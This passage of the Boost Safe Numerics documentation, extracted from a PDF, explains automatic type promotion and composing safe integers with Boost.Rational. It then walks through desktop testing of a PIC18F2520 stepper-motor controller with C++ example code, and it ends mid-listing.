- although it might We could compile\nthe program for another machine - as is common when building embedded systems and know (assuming the target machine\narchitecture was the same as our native one) that no erroneous results would ever be produced.\n3.2. Using Automatic Type Promotion\nThe C++ standard describes how binary operations on different integer types are handled. Here is a simplified version of the\nrules:\n•promote any operand smaller than int to an int or unsigned int .\n•if the size of the signed operand is larger than the size of the signed operand, the type of the result will be signed. Otherwise,\nthe type of the result will be unsigned.\n•Convert the type each operand to the type of the result, expanding the size as necessary.\n•Perform the operation the two resultant operands.\nSo the type of the result of some binary operation may be different than the types of either or both of the original operands.\nIf the values are large, the result can exceed the size that the resulting integer type can hold. This is what we call \"overflow\".\nThe C/C++ standard characterizes this as undefined behavior and leaves to compiler implementors the decision as to how such a\nsituation will be handled. Usually, this means just truncating the result to fit into the result type - which sometimes will make the\nresult arithmetically incorrect. However, depending on the compiler and compile time switch settings, such cases may result in\nsome sort of run time exception or silently producing some arbitrary result.\nThe complete signature for a safe integer type is:\ntemplate <\n class T, // underlying integer type\n class P = native , // type promotion policy class\n class E = default_exception_policy // error handling policy class\n>\nsafe;\nThe promotion rules for arithmetic operations are implemented in the default native type promotion policy are consistent with\nthose of standard C++\nUp until now, we've focused on detecting when an arithmetic error occurs and invoking an exception or other kind of error\nhandler.\nBut now we look at another option. Using the automatic type promotion policy, we can change the rules of C++ arithmetic for\nsafe types to something like the following:\n22Safe Numerics\n•for any C++ numeric type, we know from std::numeric_limits what the maximum and minimum values that a variable\ncan be - this defines a closed interval.\n•For any binary operation on these types, we can calculate the interval of the result at compile time.\n•From this interval we can select a new type which can be guaranteed to hold the result and use this for the calculation. This is\nmore or less equivalent to the following code:\nint x, y;\nint z = x + y // could overflow\n// so replace with the following:\nint x, y;\nlong z = (long)x + (long)y; // can never overflow\nOne could do this by editing his code manually as above, but such a task would be tedious, error prone, non-portable and leave\nthe resulting code hard to read and verify. Using the automatic type promotion policy will achieve the equivalent result\nwithout these problems.\nWhen using the automatic type promotion policy, with a given a binary operation, we silently promote the types of the operands\nto a wider result type so the result cannot overflow. This is a fundamental departure from the C++ Standard behavior.\nIf the interval of the result cannot be guaranteed to fit in the largest type that the machine can handle (usually 64 bits these days),\nthe largest available integer type with the correct result sign is used. So even with our \"automatic\" type promotion scheme, it's\nstill possible to overflow. So while our automatic type promotion policy might eliminate exceptions in our example above, it\nwouldn't be guaranteed to eliminate them for all programs.\nUsing the loose_trap_policy exception policy will produce a compile time error anytime it's possible for an error to occur.\nThis small example illustrates how to use automatic type promotion to eliminate all runtime penalty.\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <boost/safe_numerics /safe_integer .hpp>\n#include <boost/safe_numerics /exception_policies .hpp>\n#include <boost/safe_numerics /automatic .hpp>\n#include \"safe_format.hpp\" // prints out range and value of any type\nusing safe_t = boost::safe_numerics ::safe<\n int,\n boost ::safe_numerics ::automatic , // note use of \"automatic\" policy!!!\n boost ::safe_numerics ::loose_trap_policy\n>;\nint main(int, const char *[]){\n std::cout << \"example 82:\\n\" ;\n safe_t x(INT_MAX );\n safe_t y = 2;\n std::cout << \"x = \" << safe_format (x) << std::endl;\n std::cout << \"y = \" << safe_format (y) << std::endl;\n std::cout << \"x + y = \" << safe_format (x + y) << std::endl;\n return 0;\n23Safe Numerics\n}\n•the automatic type promotion policy has rendered the result of the sum of two integers as a safe<long > type.\n•our program compiles without error - even when using the loose_trap_policy exception policy. This is because since a\nlong can always hold the result of the sum of two integers.\n•We do not need to use the try/catch idiom to handle arithmetic errors - we will have no exceptions.\n•We only needed to change two lines of code to achieve our goal of guaranteed program correctness with no runtime penalty.\nThe above program produces the following output:\nexample 82:\nx = <int>[-2147483648,2147483647] = 2147483647\ny = <int>[-2147483648,2147483647] = 2\nx + y = <long>[-4294967296,4294967294] = 2147483649\nNote that if any time in the future we were to change safe<int> to safe<long long> the program could now overflow. But\nsince we're using loose_trap_policy the modified program would fail to compile. At this point we'd have to alter our yet\nprogram again to eliminate run time penalty or set aside our goal of zero run time overhead and change the exception policy to\ndefault_exception_policy .\nNote that once we use automatic type promotion, our programming language isn't C/C++ anymore. So don't be tempted to so\nsomething like the following:\n// DON'T DO THIS !\n#if defined (NDEBUG )\nusing safe_t = boost::numeric ::safe<\n int,\n boost ::numeric ::automatic , // note use of \"automatic\" policy!!!\n boost ::numeric ::loose_trap_policy\n>;\n#else\nusing safe_t = boost::numeric ::safe<int>;\n#endif\n3.3. Mixing Approaches\nFor purposes of exposition, we've divided the discussion of how to eliminate runtime penalties by the different approaches\navailable. A realistic program could likely include all techniques mentioned above. Consider the following:\n// Copyright (c) 2018 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <stdexcept >\n#include <iostream >\n#include <sstream >\n#include <boost /safe_numerics /safe_integer .hpp>\n24Safe Numerics\n#include <boost/safe_numerics /safe_integer_range .hpp>\n#include <boost/safe_numerics /native .hpp>\n#include <boost/safe_numerics /exception .hpp>\n#include \"safe_format.hpp\" // prints out range and value of any type\nusing namespace boost::safe_numerics ;\nusing safe_t = safe_signed_range <\n -24,\n 82,\n native ,\n loose_exception_policy\n>;\n// define variables used for input\nusing input_safe_t = safe_signed_range <\n -24,\n 82,\n native , // we don't need automatic in this case\n loose_exception_policy // assignment of out of range value should throw\n>;\n// function arguments can never be outside of limits\nauto f(const safe_t & x, const safe_t & y){\n auto z = x + y; // we know that this cannot fail\n std::cout << \"z = \" << safe_format (z) << std::endl;\n std::cout << \"(x + y) = \" << safe_format (x + y) << std::endl;\n std::cout << \"(x - y) = \" << safe_format (x - y) << std::endl;\n return z;\n}\nbool test(const char * test_string ){\n std::istringstream sin(test_string );\n input_safe_t x, y;\n try{\n std::cout << \"type in values in format x y:\" << test_string << std::endl;\n sin >> x >> y; // read varibles, maybe throw exception\n }\n catch (const std::exception & e){\n // none of the above should trap. Mark failure if they do\n std::cout << e.what() << '\\n' << \"input failure\" << std::endl;\n return false;\n }\n std::cout << \"x\" << safe_format (x) << std::endl;\n std::cout << \"y\" << safe_format (y) << std::endl;\n std::cout << safe_format (f(x, y)) << std::endl;\n std::cout << \"input success\" << std::endl;\n return true;\n}\nint main(){\n std::cout << \"example 84:\\n\" ;\n bool result =\n ! test(\"123 125\" )\n && test(\"0 0\")\n && test(\"-24 82\" )\n ;\n std::cout << (result ? \"Success!\" : \"Failure\" ) << std::endl;\n return result ? EXIT_SUCCESS : EXIT_FAILURE ;\n25Safe Numerics\n}\n•As before, we define a type safe_t to reflect our view of legal values for this program. This uses the automatic type\npromotion policy as well as the loose_trap_policy exception policy to enforce elimination of runtime penalties.\n•The function f accepts only arguments of type safe_t so there is no need to check the input values. This performs the\nfunctionality of programming by contract with no runtime cost.\n•In addition, we define input_safe_t to be used when reading variables from the program console. Clearly, these can only\nbe checked at runtime so they use the throw_exception policy. When variables are read from the console they are checked\nfor legal values. We need no ad hoc code to do this, as these types are guaranteed to contain legal values and will throw an\nexception when this guarantee is violated. In other words, we automatically get checking of input variables with no additional\nprogramming.\n•On calling of the function f, arguments of type input_safe_t are converted to values of type safe_t . In this particular\nexample, it can be determined at compile time that construction of an instance of a safe_t from an input_safe_t can never\nfail. Hence, no try/catch block is necessary. The usage of the loose_trap_policy policy for safe_t types guarantees\nthis to be true at compile time.\nHere is the output from the program when values 12 and 32 are input from the console:\nexample 84:\ntype in values in format x y:33 45\nx<signed char>[-24,82] = 33\ny<signed char>[-24,82] = 45\nz = <short>[-48,164] = 78\n(x + y) = <short>[-48,164] = 78\n(x - y) = <signed char>[-106,106] = -12\n<short>[-48,164] = 78\n4. Case Studies\n4.1. Composition with Other Libraries\nFor many years, Boost has included a library to represent and operate on rational numbers . Its well crafted, has good\ndocumentation and is well maintained. Using the rational library is as easy as construction an instance with the expression\nrational r(n, d) where n and d are integers of the same type. From then on it can be used pretty much as any other number.\nReading the documentation with safe integers in mind one finds\nLimited-precision integer types [such as int] may raise issues with the range sizes of their allowable negative\nvalues and positive values. If the negative range is larger, then the extremely-negative numbers will not have\nan additive inverse in the positive range, making them unusable as denominator values since they cannot be\nnormalized to positive values (unless the user is lucky enough that the input components are not relatively\nprime pre-normalization).\nWhich hints of trouble. Examination of the code reveals which suggest that care has been taken implement operations so as to\navoid overflows, catch divide by zero, etc. But the code itself doesn't seem to consistently implement this idea. So we make a\nsmall demo program:\n// Copyright (c) 2018 Robert Ramey\n//\n26Safe Numerics\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n#include <limits >\n#include <boost/rational .hpp>\n#include <boost/safe_numerics /safe_integer .hpp>\nint main(int, const char *[]){\n // simple demo of rational library\n const boost::rational <int> r {1, 2};\n std::cout << \"r = \" << r << std::endl;\n const boost::rational <int> q {-2, 4};\n std::cout << \"q = \" << q << std::endl;\n // display the product\n std::cout << \"r * q = \" << r * q << std::endl;\n // problem: rational doesn't handle integer overflow well\n const boost::rational <int> c {1, INT_MAX };\n std::cout << \"c = \" << c << std::endl;\n const boost::rational <int> d {1, 2};\n std::cout << \"d = \" << d << std::endl;\n // display the product - wrong answer\n std::cout << \"c * d = \" << c * d << std::endl;\n // solution: use safe integer in rational definition\n using safe_rational = boost::rational <\n boost ::safe_numerics ::safe<int>\n >;\n // use rationals created with safe_t\n const safe_rational sc {1, std::numeric_limits <int>::max()};\n std::cout << \"c = \" << sc << std::endl;\n const safe_rational sd {1, 2};\n std::cout << \"d = \" << sd << std::endl;\n std::cout << \"c * d = \" ;\n try {\n // multiply them. This will overflow\n std::cout << (sc * sd) << std::endl;\n }\n catch (std::exception const& e) {\n // catch exception due to multiplication overflow\n std::cout << e.what() << std::endl;\n }\n return 0;\n}\nwhich produces the following output\nr = 1/2\nq = -1/2\nr * q = -1/4\nc = 1/2147483647\nd = 1/2\nc * d = 1/-2\n27Safe Numerics\nc = 1/2147483647\nd = 1/2\nc * d = multiplication overflow: positive overflow error\nThe rational library documentation is quite specific as to the type requirements placed on the underlying type. Turns out the our\nown definition of an integer type fulfills (actually surpasses) these requirements. So we have reason to hope that we can use\nsafe<int> as the underlying type to create what we might call a \" safe_rational \". This we have done in the above example\nwhere we demonstrate how to compose the rational library with the safe numerics library in order to create what amounts\nto a safe_rational library - all without writing a line of code! Still, things are not perfect. Since the rational numbers library\nimplements its own checking for divide by zero by throwing an exception, the safe numerics code for handling this - included\nexception policy will not be respected. To summarize:\n•In some cases safe types can be used as template parameters to other types to inject the concept of \"no erroneous results\" into\nthe target type.\n•Such composition is not guaranteed to work. The target type must be reviewed in some detail.\n4.2. Safety Critical Embedded Controller\nSuppose we are given the task of creating stepper motor driver software to drive a robotic hand to be used in robotic micro\nsurgery. The processor that has been selected by the engineers is the PIC18F2520 manufactured by Microchip Corporation . This\nprocessor has 32KB of program memory. On a processor this small, it's common to use a mixture of 8, 16, and 32 bit data types in\norder to minimize memory footprint and program run time. The type int has 16 bits. It's programmed in C. Since this program is\ngoing to be running life critical function, it must be demonstrably correct. This implies that it needs to be verifiable and testable.\nSince the target micro processor is inconvenient for accomplishing these goals, we will build and test the code on the desktop.\nHow a Stepper Motor Works\nFigure 1.1. Stepper Motor\nA stepper motor controller emits a pulse which causes the motor to move one step. It seems simple, but in practice it turns out\nto be quite intricate to get right as one has to time the pulses individually to smoothly accelerate the rotation of the motor from a\nstanding start until it reaches the some maximum velocity. Failure to do this will either limit the stepper motor to very low speed\nor result in skipped steps when the motor is under load. Similarly, a loaded motor must be slowly decelerated down to a stop.\n28Safe Numerics\nFigure 1.2. Motion Profile\nThis implies the the width of the pulses must decrease as the motor accelerates. That is the pulse with has to be computed while\nthe motor is in motion. This is illustrated in the above drawing. A program to accomplish this might look something like the\nfollowing:\nsetup registers and step to zero position\nspecify target position\nset initial time to interrupt\nenable interrupts\nOn interrupt\n if at target position\n disable interrupts and return\n calculate width of next step\n change current winding according to motor direction\n set delay time to next interrupt to width of next step\nAlready, this is turning it to a much more complex project than it first seemed. Searching around the net, we find a popular article\non the operation of stepper motors using simple micro controllers. The algorithm is very well explained and it includes complete\ncode we can test . The engineers are still debugging the prototype boards and hope to have them ready before the product actually\nships. But this doesn't have to keep us from working on our code.\nUpdating the Code\nInspecting this code, we find that it is written in a dialect of C rather than C itself. At the time this code was written, conforming\nversions of the C compiler were not available for PIC processors. We want to compile this code on the Microchip XC8 compiler\nwhich, for the most part, is standards conforming. So we made the following minimal changes:\n•Factor into motor1.c which contains the motor driving code and motor_test1.c which tests that code.\n29Safe Numerics\n•Include header <xc.h> which contains constants for the PIC18F2520 processor\n•Include header <stdint.h> to include standard Fixed width integer types.\n•Include header <stdbool.h> to include keywords true and false in a C program.\n•The original has some anomalies in the names of types. For example, int16 is assumed to be unsigned. This is an artifact of\nthe original C compiler being used. So type names in the code were altered to standard ones while retaining the intent of the\noriginal code.\n•Add in missing make16 function.\n•Format code to personal taste.\n•Replaced enable_interrupts and disable_interrupts functions with appropriate PIC commands.\nThe resulting program can be checked to be identical to the original but compiles on with the Microchip XC8 compiler. Given\na development board, we could hook it up to a stepper motor, download and boot the code and verify that the motor rotates 5\nrevolutions in each direction with smooth acceleration and deceleration. We don't have such a board yet, but the engineers have\npromised a working board real soon now.\nRefactor for Testing\nIn order to develop our test suite and execute the same code on the desktop and the target system we factor out the shared code as\na separate module which will used in both environments without change. The shared module motor2.c contains the algorithm\nfor handling the interrupts in such a way as to create the smooth acceleration we require.\n motor_test2.c example92.cpp\n #include ... #include ...\n PIC typedefs ... desktop types ...\n \\ /\n \\ /\n #include motor2.c\n / \\\n / \\\n PIC test code desktop test code\nCompiling on the Desktop\nUsing the target environment to run tests is often very difficult or impossible due to limited resources. So software unit testing for\nembedded systems is very problematic and often skipped. The C language on our desktop is the same used by the PIC18F2520 .\nSo now we can also run and debug the code on our desktop machine. Once our code passes all our tests, we can download the\ncode to the embedded hardware and run the code natively. Here is a program we use on the desktop to do that:\n//////////////////////////////////////////////////////////////////\n// example92.cpp\n//\n// Copyright (c) 2015 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n// *************************** \n30Safe Numerics\n// 1. include headers to support safe integers\n#include <boost/safe_numerics /cpp.hpp>\n#include <boost/safe_numerics /exception .hpp>\n#include <boost/safe_numerics /safe_integer .hpp>\n// *************************** \n// 2. specify a promotion policy to support proper emulation of \n// PIC types on the desktop\nusing pic16_promotion = boost::safe_numerics ::cpp<\n 8, // char 8 bits\n 16, // short 16 bits\n 16, // int 16 bits\n 16, // long 16 bits\n 32 // long long 32 bits\n>;\n// 1st step=50ms; max speed=120rpm (based on 1MHz timer, 1.8deg steps)\n#define C0 (50000 << 8)\n#define C_MIN (2500 << 8)\nstatic_assert (C0 < 0xffffff , \"Largest step too long\" );\nstatic_assert (C_MIN > 0, \"Smallest step must be greater than zero\" );\nstatic_assert (C_MIN < C0, \"Smallest step must be smaller than largest step\" );\n// *************************** \n// 3. define PIC integer type names to be safe integer types of he same size.\ntemplate <typename T> // T is char, int, etc data type\nusing safe_t = boost::safe_numerics ::safe<\n T,\n pic16_promotion\n>;\n// alias original program's integer types to corresponding PIC safe types\n// In conjunction with the promotion policy above, this will permit us to \n// guarantee that the resulting program will be free of arithmetic errors \n// introduced by C expression syntax and type promotion with no runtime penalty\ntypedef safe_t <int8_t > int8;\ntypedef safe_t <int16_t > int16;\ntypedef safe_t <int32_t > int32;\ntypedef safe_t <uint8_t > uint8;\ntypedef safe_t <uint16_t > uint16 ;\ntypedef safe_t <uint32_t > uint32 ;\n// *************************** \n// 4. emulate PIC features on the desktop\n// filter out special keyword used only by XC8 compiler\n#define __interrupt\n// filter out XC8 enable/disable global interrupts\n#define ei()\n#define di()\n// emulate PIC special registers\nuint8 RCON;\nuint8 INTCON ;\nuint8 CCP1IE ;\nuint8 CCP2IE ;\nuint8 PORTC;\n31Safe Numerics\nuint8 TRISC;\nuint8 T3CON;\nuint8 T1CON;\nuint8 CCPR2H ;\nuint8 CCPR2L ;\nuint8 CCPR1H ;\nuint8 CCPR1L ;\nuint8 CCP1CON ;\nuint8 CCP2CON ;\nuint8 TMR1H;\nuint8 TMR1L;\n// create type used to map PIC bit names to\n// correct bit in PIC register\ntemplate <typename T, std::int8_t N>\nstruct bit {\n T & m_word ;\n constexpr explicit bit(T & rhs) :\n m_word (rhs)\n {}\n constexpr bit & operator =(int b){\n if(b != 0)\n m_word |= (1 << N);\n else\n m_word &= ~(1 << N);\n return *this;\n }\n constexpr operator int () const {\n return m_word >> N & 1;\n }\n};\n// define bits for T1CON register\nstruct {\n bit<uint8 , 7> RD16{T1CON};\n bit<uint8 , 5> T1CKPS1 {T1CON};\n bit<uint8 , 4> T1CKPS0 {T1CON};\n bit<uint8 , 3> T1OSCEN {T1CON};\n bit<uint8 , 2> T1SYNC {T1CON};\n bit<uint8 , 1> TMR1CS {T1CON};\n bit<uint8 , 0> TMR1ON {T1CON};\n} T1CONbits ;\n// define bits for T1CON register\nstruct {\n bit<uint8 , 7> GEI{INTCON };\n bit<uint8 , 5> PEIE{INTCON };\n bit<uint8 , 4> TMR0IE {INTCON };\n bit<uint8 , 3> RBIE{INTCON };\n bit<uint8 , 2> TMR0IF {INTCON };\n bit<uint8 , 1> INT0IF {INTCON };\n bit<uint8 , 0> RBIF{INTCON };\n} INTCONbits ;\n// ***************************\n// 5. include the environment independent code we want to test\n#include \"motor2.c\"\n#include <chrono >\n32Safe Numerics\n#include <thread >\n// round 24.8 format to microseconds\nint32 to_microseconds (uint32 t){\n return (t + 128) / 256;\n}\nusing result_t = uint8_t ;\nconst result_t success = 1;\nconst result_t fail = 0;\n// move motor to the indicated target position in steps\nresult_t test(int32 m){\n try {\n std::cout << \"move motor to \" << m << '\\n';\n motor_run (m);\n std::cout\n << \"step #\" << ' '\n << \"delay(us)(24.8)\" << ' '\n << \"delay(us)\" << ' '\n << \"CCPR\" << ' '\n << \"motor position\" << '\\n';\n do{\n std::this_thread ::sleep_for (std::chrono ::microseconds (to_microseconds (c)));\n uint32 last_c = c;\n uint32 last_ccpr = ccpr;\n isr_motor_step ();\n std::cout\n << step_no << ' '\n << last_c << ' '\n << to_microseconds (last_c ) << ' '\n << std::hex << last_ccpr << std::dec << ' '\n << motor_pos << '\\n';\n }while(run_flg );\n }\n catch (const std::exception & e){\n std::cout << e.what() << '\\n';\n return fail;\n }\n return success ;\n}\nint main(){\n std::cout << \"start test\\n\" ;\n result_t result = success ;\n try{\n initialize ();\n // move motor to position 1000\n result &= test(1000);\n // move motor to position 200\n result &= test(200);\n // move motor to position 200 again! Should result in no movement.\n result &= test(200);\n // move back to position 0\n result &= test(0);\n // ***************************\n // 6. error detected here! data types can't handle enough\n // steps to move the carriage from end to end! Suppress this\n // test for now.\n // move motor to position 50000.\n33Safe Numerics\n// result &= test(50000);\n // move motor back to position 0.\n result &= test(0);\n }\n catch (const std::exception & e){\n std::cout << e.what() << '\\n';\n return 1;\n }\n catch (...){\n std::cout << \"test interrupted\\n\" ;\n return EXIT_FAILURE ;\n }\n std::cout << \"end test\\n\" ;\n return result == success ? EXIT_SUCCESS : EXIT_FAILURE ;\n}\nHere are the essential features of the desktop version of the test program.\n1.Include headers required to support safe integers.\n2.Specify a promotion policy to support proper emulation of PIC types on the desktop.\nThe C language standard doesn't specify sizes for primitive data types like int. They can and do differ between environments.\nHence, the characterization of C/C++ as \"portable\" languages is not strictly true. Here we choose aliases for data types so\nthat they can be defined to be the same in both environments. But this is not enough to emulate the PIC18F2520 on the\ndesktop. The problem is that compilers implicitly convert arguments of C expressions to some common type before performing\narithmetic operations. Often, this common type is the native int and the size of this native type is different in the desktop and\nembedded environment. Thus, many arithmetic results would be different in the two environments.\nBut now we can specify our own implicit promotion rules for test programs on the development platform that are identical to\nthose on the target environment! So unit testing executed in the development environment can now provide results relevant to\nthe target environment.\n3.Define PIC integer type aliases to be safe integer types of he same size.\nCode tested in the development environment will use safe numerics to detect errors. We need these aliases to permit the code\nin motor2.c to be tested in the desktop environment. The same code run in the target system without change.\n4.Emulate PIC features on the desktop.\nThe PIC processor, in common with most micro controllers these days, includes a myriad of special purpose peripherals to\nhandle things like interrupts, USB, timers, SPI bus, I^2C bus, etc.. These peripherals are configured using special 8 bit words\nin reserved memory locations. Configuration consists of setting particular bits in these words. To facilitate configuration\noperations, the XC8 compiler includes a special syntax for setting and accessing bits in these locations. One of our goals is to\npermit the testing of the identical code with our desktop C++ compiler as will run on the micro controller. To realize this goal,\nwe create some C++ code which implements the XC8 C syntax for setting bits in particular memory locations.\n5.include motor1.c\n6.Add test to verify that the motor will be able to keep track of a position from 0 to 50000 steps. This will be needed to maintain\nthe position of out linear stage across a range from 0 to 500 mm.\nOur first attempt to run this program fails by throwing an exception from motor1.c indicating that the code attempts to left shift a\nnegative number at the statements:\ndenom = ((step_no - move) << 2) + 1;\n34Safe Numerics\nAccording to the C/C++ standards this is implementation defined behavior. But in practice with all modern platforms (as far\nas I know), this will be equivalent to a multiplication by 4. Clearly the intent of the original author is to \"micro optimize\" the\noperation by substituting a cheap left shift for a potentially expensive integer multiplication. But on all modern compilers, this\nsubstitution will be performed automatically by the compiler's optimizer. So we have two alternatives here:\n•Just ignore the issue.\nThis will work when the code is run on the PIC. But, in order to permit testing on the desktop, we need to inhibit the error\ndetection in that environment. With safe numerics, error handling is determined by specifying an exception policy . In this\nexample, we've used the default exception policy which traps implementation defined behavior. To ignore this kind of behavior\nwe could define our own custom exception policy .\n•change the << 2 to * 4. This will produce the intended result in an unambiguous, portable way. For all known compilers, this\nchange should not affect runtime performance in any way. It will result in unambiguously portable code.\n•Alter the code so that the expression in question is never negative. Depending on sizes of the operands and the size of the\nnative integer, this expression might return convert the operands to int or result in an invalid result.\nOf these alternatives, the third seems the more definitive fix so we'll choose that one. We also decide to make a couple of minor\nchanges to simplify the code and make mapping of the algorithm in the article to the code more transparent. With these changes,\nour test program runs to the end with no errors or exceptions. In addition, I made a minor change which simplifies the handling of\nfloating point values in format of 24.8. This results in motor2.c which makes the above changes. It should be easy to see that these\ntwo versions are otherwise identical.\nFinally our range test fails. In order to handle the full range we need, we'll have to change some data types used for holding step\ncount and position. We won't do that here as it would make our example too complex. We'll deal with this on the next version.\nTrapping Errors at Compile Time\nWe can test the same code we're going to load into our target system on the desktop. We could build and execute a complete unit\ntest suite. We could capture the output and graph it. We have the ability to make are code much more likely to be bug free. But:\n•This system detects errors and exceptions on the test machine - but it fails to address and detect such problems on the target\nsystem. Since the target system is compiles only C code, we can't use the exception/error facilities of this library at runtime.\n•Testing shows the presence, not the absence of bugs . Can we not prove that all integer arithmetic is correct?\n•For at least some operations on safe integers there is runtime cost in checking for errors. In this example, this is not really a\nproblem as the safe integer code is not included when the code is run on the target - it's only a C compiler after all. But more\ngenerally, using safe integers might incur an undesired runtime cost.\nCan we catch all potential problems at compiler time and therefore eliminate all runtime cost?\nOur first attempt consists of simply changing default exception policy from the default runtime checking to the compile time\ntrapping one. Then we redefine the aliases for the types used by the PIC to use this exception policy.\n// generate compile time errors if operation could fail \nusing trap_policy = boost ::numeric ::loose_trap_policy ;\n...\ntypedef safe_t <int8_t , trap_policy > int8;\n...\nWhen we compile now, any expressions which could possibly fail will be flagged as syntax errors. This occurs 11 times when\ncompiling the motor2.c program. This is fewer than one might expect. To understand why, consider the following example:\nsafe<std::int8_t > x, y;\n...\n35Safe Numerics\nsafe<std::int16_t > z = x + y;\nC promotion rules and arithmetic are such that the z will always contain an arithmetically correct result regardless of what values\nare assigned to x and y. Hence there is no need for any kind of checking of the arithmetic or result. The Safe Numerics library\nuses compile time range arithmetic, C++ template multiprogramming and other techniques to restrict invocation of checking code\nto only those operations which could possible fail. So the above code incurs no runtime overhead.\nNow we have 11 cases to consider. Our goal is to modify the program so that this number of cases is reduced - hopefully to zero.\nInitially I wanted to just make a few tweaks in the versions of example92.c , motor2.c and motor_test2.c above without\nactually having to understand the code. It turns out that one needs to carefully consider what various types and variables are\nused for. This can be a good thing or a bad thing depending on one's circumstances, goals and personality. The programs above\nevolved into example93.c , motor3.c and motor_test3.c . First we'll look at example93.c :\n//////////////////////////////////////////////////////////////////\n// example93.cpp\n//\n// Copyright (c) 2015 Robert Ramey\n//\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n#include <iostream >\n// include headers to support safe integers\n#include <boost /safe_numerics /cpp.hpp>\n#include <boost /safe_numerics /exception .hpp>\n#include <boost /safe_numerics /safe_integer .hpp>\n#include <boost /safe_numerics /safe_integer_range .hpp>\n#include <boost /safe_numerics /safe_integer_literal .hpp>\n// use same type promotion as used by the pic compiler\n// target compiler XC8 supports:\nusing pic16_promotion = boost::safe_numerics ::cpp<\n 8, // char 8 bits\n 16, // short 16 bits\n 16, // int 16 bits\n 16, // long 16 bits\n 32 // long long 32 bits\n>;\n// ***************************\n// 1. Specify exception policies so we will generate a\n// compile time error whenever an operation MIGHT fail.\n// ***************************\n// generate runtime errors if operation could fail\nusing exception_policy = boost::safe_numerics ::default_exception_policy ;\n// generate compile time errors if operation could fail\nusing trap_policy = boost ::safe_numerics ::loose_trap_policy ;\n// ***************************\n// 2. Create a macro named literal an integral value\n// that can be evaluated at compile time.\n#define literal (n) make_safe_literal (n, pic16_promotion , void)\n// For min speed of 2 mm / sec (24.8 format)\n36Safe Numerics\n// sec / step = sec / 2 mm * 2 mm / rotation * rotation / 200 steps\n#define C0 literal (5000 << 8)\n// For max speed of 400 mm / sec\n// sec / step = sec / 400 mm * 2 mm / rotation * rotation / 200 steps\n#define C_MIN literal (25 << 8)\nstatic_assert (\n C0 < make_safe_literal (0xffffff , pic16_promotion ,trap_policy ),\n \"Largest step too long\"\n);\nstatic_assert (\n C_MIN > make_safe_literal (0, pic16_promotion ,trap_policy ),\n \"Smallest step must be greater than zero\"\n);\n// ***************************\n// 3. Create special ranged types for the motor program\n// These wiil guarantee that values are in the expected\n// ranges and permit compile time determination of when\n// exceptional conditions might occur.\nusing pic_register_t = boost::safe_numerics ::safe<\n uint8_t ,\n pic16_promotion ,\n trap_policy // use for compiling and running tests\n>;\n// note: the maximum value of step_t would be:\n// 50000 = 500 mm / 2 mm/rotation * 200 steps/rotation.\n// But in one expression the value of number of steps * 4 is\n// used. To prevent introduction of error, permit this\n// type to hold the larger value.\nusing step_t = boost::safe_numerics ::safe_unsigned_range <\n 0,\n 200000 ,\n pic16_promotion ,\n exception_policy\n>;\n// position\nusing position_t = boost::safe_numerics ::safe_unsigned_range <\n 0,\n 50000 , // 500 mm / 2 mm/rotation * 200 steps/rotation\n pic16_promotion ,\n exception_policy\n>;\n// next end of step timer value in format 24.8\n// where the .8 is the number of bits in the fractional part.\nusing ccpr_t = boost::safe_numerics ::safe<\n uint32_t ,\n pic16_promotion ,\n exception_policy\n>;\n// pulse length in format 24.8\n// note: this value is constrainted to be a positive value. But\n// we still need to make it a signed type. We get an arithmetic\n// error when moving to a negative step number.\n37Safe Numerics\nusing c_t = boost::safe_numerics ::safe_unsigned_range <\n C_MIN ,\n C0,\n pic16_promotion ,\n exception_policy\n>;\n// 32 bit unsigned integer used for temporary purposes\nusing temp_t = boost::safe_numerics ::safe_unsigned_range <\n 0, 0xffffffff ,\n pic16_promotion ,\n exception_policy\n>;\n// index into phase table\n// note: The legal values are 0-3. So why must this be a signed\n// type? Turns out that expressions like phase_ix + d\n// will convert both operands to unsigned. This in turn will\n// create an exception. So leave it signed even though the\n// value is greater than zero.\nusing phase_ix_t = boost::safe_numerics ::safe_signed_range <\n 0,\n 3,\n pic16_promotion ,\n trap_policy\n>;\n// settings for control value output\nusing phase_t = boost::safe_numerics ::safe<\n uint16_t ,\n pic16_promotion ,\n trap_policy\n>;\n// direction of rotation\nusing direction_t = boost ::safe_numerics ::safe_signed_range <\n -1,\n +1,\n pic16_promotion ,\n trap_policy\n>;\n// some number of microseconds\nusing microseconds = boost ::safe_numerics ::safe<\n uint32_t ,\n pic16_promotion ,\n trap_policy\n>;\n// *************************** \n// emulate PIC features on the desktop\n// filter out special keyword used only by XC8 compiler\n#define __interrupt\n// filter out XC8 enable/disable global interrupts\n#define ei()\n#define di()\n// emulate PIC special registers\n38Safe Numerics\npic_register_t RCON;\npic_register_t INTCON ;\npic_register_t CCP1IE ;\npic_register_t CCP2IE ;\npic_register_t PORTC;\npic_register_t TRISC;\npic_register_t T3CON;\npic_register_t T1CON;\npic_register_t CCPR2H ;\npic_register_t CCPR2L ;\npic_register_t CCPR1H ;\npic_register_t CCPR1L ;\npic_register_t CCP1CON ;\npic_register_t CCP2CON ;\npic_register_t TMR1H;\npic_register_t TMR1L;\n// ***************************\n// special checked type for bits - values restricted to 0 or 1\nusing safe_bit_t = boost::safe_numerics ::safe_unsigned_range <\n 0,\n 1,\n pic16_promotion ,\n trap_policy\n>;\n// create type used to map PIC bit names to\n// correct bit in PIC register\ntemplate <typename T, std::int8_t N>\nstruct bit {\n T m_word ;\n constexpr explicit bit(T & rhs) :\n m_word (rhs)\n {}\n // special functions for assignment of literal\n constexpr bit & operator =(decltype (literal (1))){\n m_word |= literal (1 << N);\n return *this;\n }\n constexpr bit & operator =(decltype (literal (0))){\n m_word &= ~literal (1 << N);\n return *this;\n }\n // operator to convert to 0 or 1\n constexpr operator safe_bit_t () const {\n return m_word >> literal (N) & literal (1);\n }\n};\n// define bits for T1CON register\nstruct {\n 